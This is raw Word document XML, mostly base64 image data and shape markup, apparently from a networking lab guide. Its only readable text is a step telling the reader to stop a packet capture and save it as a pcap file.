//ANrr8uqZe8dH2U480PdPo8RmNHBayk48/Y6/&#10;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X4oT8QUFAADjGAAADgAAAAAAAAAA&#10;AAAAAAA9AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEAFlCmPP0IAgD9CAIAFAAAAAAA&#10;AAAAAAAAAABuBwAAZHJzL21lZGlhL2ltYWdlMS5qcGdQSwECLQAKAAAAAAAAACEAYXDeCY8pAgCP&#10;KQIAFAAAAAAAAAAAAAAAAACdEAIAZHJzL21lZGlhL2ltYWdlMi5qcGdQSwECLQAUAAYACAAAACEA&#10;7IM/V90AAAAGAQAADwAAAAAAAAAAAAAAAABeOgQAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgA&#10;AAAhAHvAOJLDAAAApQEAABkAAAAAAAAAAAAAAAAAaDsEAGRycy9fcmVscy9lMm9Eb2MueG1sLnJl&#10;bHNQSwUGAAAAAAcABwC+AQAAYjwEAAAA&#10;">
                <v:rect id="Rectangle 2893" o:spid="_x0000_s1201" style="position:absolute;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43477B54" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2894" o:spid="_x0000_s1202" style="position:absolute;top:202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175F9DD0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2895" o:spid="_x0000_s1203" style="position:absolute;left:59448;top:36137;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114A36DA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2896" o:spid="_x0000_s1204" style="position:absolute;left:59448;top:69855;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5D6A87A6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2897" o:spid="_x0000_s1205" style="position:absolute;top:71501;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480E157C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2898" o:spid="_x0000_s1206" style="position:absolute;top:73527;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442121C4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2905" o:spid="_x0000_s1207" type="#_x0000_t75" style="position:absolute;left:383;top:3900;width:58737;height:3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JXyAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvBb9DeEJvNVFssVuj2H/Q6kHrVvD42Dw3i5uXZRN120/fFAo9DjPzG2Y671wtztSGyrOG4UCB&#10;IC68qbjU8Jm/3kxAhIhssPZMGr4owHzWu5piZvyFP+i8jaVIEA4ZarAxNpmUobDkMAx8Q5y8g28d&#10;xiTbUpoWLwnuajlS6k46rDgtWGzoyVJx3J6chpfGfe/y582pztX6fWX2j+Pl2Gp93e8WDyAidfE/&#10;/Nd+MxpG9+oWft+kJyBnPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBchrJXyAAAAN0A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:imagedata r:id="rId65" o:title=""/>
                </v:shape>
                <v:shape id="Shape 2906" o:spid="_x0000_s1208" style="position:absolute;left:256;top:3773;width:58991;height:33294;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xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hvAVvmlpFtGsU8R971Cose3s0z7bYvJQm2vrtNwsLHoeZ+Q2zXHemEk9qXGlZwXgUgSDO&#10;rC45V3C9HIZzEM4ja6wsk4IXOViv+r0lJtq2fKZn6nMRIOwSVFB4XydSuqwgg25ka+Lg3Wxj0AfZ&#10;5FI32Aa4qWQcRTNpsOSwUGBN24Kye/owCvZt/O1/Tsf7fHyzup7mO56cLkoNPrrNJwhPnX+H/9tf&#10;WkG8iGbw9yY8Abn6BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAP6X8+/EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <v:shape id="Picture 2908" o:spid="_x0000_s1209" type="#_x0000_t75" style="position:absolute;left:383;top:37619;width:58737;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rY0xQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE89b8Iw&#10;EN0r8R+sQ+pSgVOGqgQMQgGqCqkDgQG2U3wkgfic2i5J/z0eKnV8et/zZW8acSfna8sKXscJCOLC&#10;6ppLBcfDdvQOwgdkjY1lUvBLHpaLwdMcU2073tM9D6WIIexTVFCF0KZS+qIig35sW+LIXawzGCJ0&#10;pdQOuxhuGjlJkjdpsObYUGFLWUXFLf8xCj6+vk9nebhmLt/h+ZKtN6uX7qjU87BfzUAE6sO/+M/9&#10;qRVMpkmcG9/EJyAXDwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCAfrY0xQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                  <v:imagedata r:id="rId66" o:title=""/>
                </v:shape>
                <v:shape id="Shape 2909" o:spid="_x0000_s1210" style="position:absolute;left:256;top:37492;width:58991;height:33204;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5899150,332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mzwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NigIx&#10;EITvC75DaGFva0YPoqNRRHDx6C9em0mbGZx0xumsjm+/ERb2WFTVV9R82flaPaiVKrCB4SADRVwE&#10;W7EzcDpuviagJCJbrAOTgRcJLBe9jznmNjx5T49DdCpBWHI0UMbY5FpLUZJHGYSGOHnX0HqMSbZO&#10;2xafCe5rPcqysfZYcVoosaF1ScXt8OMNrF7jsLl0zt2Lb5br/iLn3U2M+ex3qxmoSF38D/+1t9bA&#10;aJpN4f0mPQG9+AUAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBDeAmzwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m,3320415r5899150,l5899150,,,,,3320415xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3320415"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2146886D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EC799E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700268D4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C8354" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC70029" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E0C25"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01248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14D89F02" wp14:editId="5558BEB5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40347" name="Group 4034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80" name="Shape 497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81" name="Shape 497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82" name="Shape 497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83" name="Shape 497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84" name="Shape 497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47" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49785" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49786" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49787" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49788" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4978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02272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4898FB52" wp14:editId="2FEE6343">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40350" name="Group 4035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790" name="Shape 497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91" name="Shape 497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92" name="Shape 497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793" name="Shape 497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94" name="Shape 497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50" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49795" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49796" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49797" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49798" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4979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Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stop capturing packets and save file as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04CCF9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6762DF73" wp14:editId="57231E03">
                <wp:extent cx="5986577" cy="3550180"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40342" name="Group 40342"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3550180"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3550180"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2979" name="Rectangle 2979"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3236387"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4F74BE97"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980" name="Rectangle 2980"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3400979"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="126343D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004" name="Picture 3004"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3005" name="Shape 3005"/>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62DF73" id="Group 40342" o:spid="_x0000_s1211" style="width:471.4pt;height:279.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59865,35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f4NHBgQAAO8LAAAOAAAAZHJzL2Uyb0RvYy54bWzMVm1v2zYQ/j5g&#10;/0HQ98ayZdmyEKcYmjUoMKxB2/0AmqIsYRRJkPTbfv3ujpTsxulSZEDRAJFP4vH43HMvvNu3x14m&#10;e2Fdp9U6nd5kaSIU13Wntuv0ry/v35Rp4jxTNZNaiXV6Ei59e/frL7cHU4mZbrWshU3AiHLVwazT&#10;1ntTTSaOt6Jn7kYboWCx0bZnHl7tdlJbdgDrvZzMsmwxOWhbG6u5cA6+3ofF9I7sN43g/mPTOOET&#10;uU4Bm6enpecGn5O7W1ZtLTNtxyMM9goUPesUHDqaumeeJTvbXZnqO261042/4bqf6KbpuCAfwJtp&#10;9sSbB6t3hnzZVoetGWkCap/w9Gqz/M/9gzWfzaMFJg5mC1zQG/pybGyPv4AyORJlp5EycfQJh4/F&#10;qlwUy2WacFjLiyKblpFU3gLzV/t4+/sLOyfDwZOv4BwMJIg7c+D+HwefW2YEUesq4ODRJl29Tmer&#10;5SpNFOshUz9B7jC1lSKhr0QP6Y5kucoBb88wVazm83IG6YaczPJFXi5Doo2sFUUOhYGcTVflPF/g&#10;8ug4q4x1/kHoPkFhnVqAQtnF9n84H1QHFTxeKnwq/b6TMqziF+BvQIiSP26O5GSZ42n4aaPrE3je&#10;avvPR6jhRurDOtVRSrGs4XBcTRP5QQHjWEGDYAdhMwjWy3ea6izA+W3nddMR3vNpEReEMmD4ATGF&#10;jHwmpiFPERjE/+WYxmjOswxzBAhk1c8RzfnPEk3T8Qr+Y5cC6apCX+7msMvvrEijkf67bPTM/r0z&#10;b6ChGua7TSc7f6LLAWoGQan9Y8exUPHlXOx5ls2HxAAFPDehbxDcQRP3YUXh+1dmNrIzWG6YByhH&#10;wHCzPOnMz/gcuv695rteKB+uMSskYNfKtZ1xaWIr0W8EdCT7oZ6GbHPeCs9bPLCBg7E9ITJWjQuE&#10;8gwMMX+jQeVlnuXUnqazZRYb9pjO5TJfFpDv1NJBcZUVCOG1/YlgBSAkAq4fVPoQzWKIMDV8jC/5&#10;8t1lPysWkakrllar6Zml2Sq/YonvQhfHkA2dGyaEOvRw+NYOEj+qQcRe/5/DCuQ47kOjKCbQsosy&#10;YmnhvskDFFzvoZd/0aTpzzfxoBFCetaR6lJ3tIl3WLQZdgx6w68h25f6RBWky6Ax/AbN0Emf6nCp&#10;nQgHoFuUbqOrYOuSTKnQ61kBzRiylMHY2ED10A0JE5OqB5xgBAMdco8kf5IC+ZDqk2jgNoQJZkr7&#10;nN1u3kmb7BleYPQXc55UcU+ourgr++YuVGXStCzaimbiAeRXtISagmbUEUw0yyOaMKjCuAd+DuMq&#10;cDFuIlha+XG/giGbDrzwFsVw0yMv+EaXL41XMFUSojgB49h6+U765zn97l8AAAD//wMAUEsDBAoA&#10;AAAAAAAAIQBvxMTunM8BAJzPAQAUAAAAZHJzL21lZGlhL2ltYWdlMS5qcGf/2P/gABBKRklGAAEB&#10;AQBgAGAAAP/bAEMAAwICAwICAwMDAwQDAwQFCAUFBAQFCgcHBggMCgwMCwoLCw0OEhANDhEOCwsQ&#10;FhARExQVFRUMDxcYFhQYEhQVFP/bAEMBAwQEBQQFCQUFCRQNCw0UFBQUFBQUFBQUFBQUFBQUFB